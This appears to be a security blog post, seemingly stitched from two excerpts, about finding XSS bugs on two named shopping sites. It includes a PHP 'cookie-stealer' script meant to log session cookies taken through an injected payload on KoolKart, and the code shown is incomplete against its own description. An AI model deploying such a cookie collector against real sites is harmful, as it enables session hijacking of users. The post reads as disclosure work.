Earlier, I demonstrated the XSS vulnerability in DealsAndYou (fixed), and now I’ll demo an XSS bug on KoolKart.com. I’ll describe the whole process below.
Step 1 – Writing a PHP script for saving the cookie returned by the injected code (cookie-stealer.php).
$str = trim($_REQUEST['cookie']);
$file = 'cookie.txt';
$current = file_get_contents($file);
$current .= date('Y-m-d H:i:s') . "\t\t" . $str . "\n\n\n";
The code is self-explanatory. It gets the cookie information via the query string, saves it to a text file and redirects back to KoolKart.
Dealsandyou.com, Y U NO sanitize input
Update: Dealsandyou has fixed the bug. Responded on twitter with a thanks.
I was looking at dealsandyou.com a couple of days back and something (maybe their bad design) made me do an XSS vulnerability test on their “Search” input box using the XSS Locator code snippet. Voila! An alert box popped up, confirming my hunch.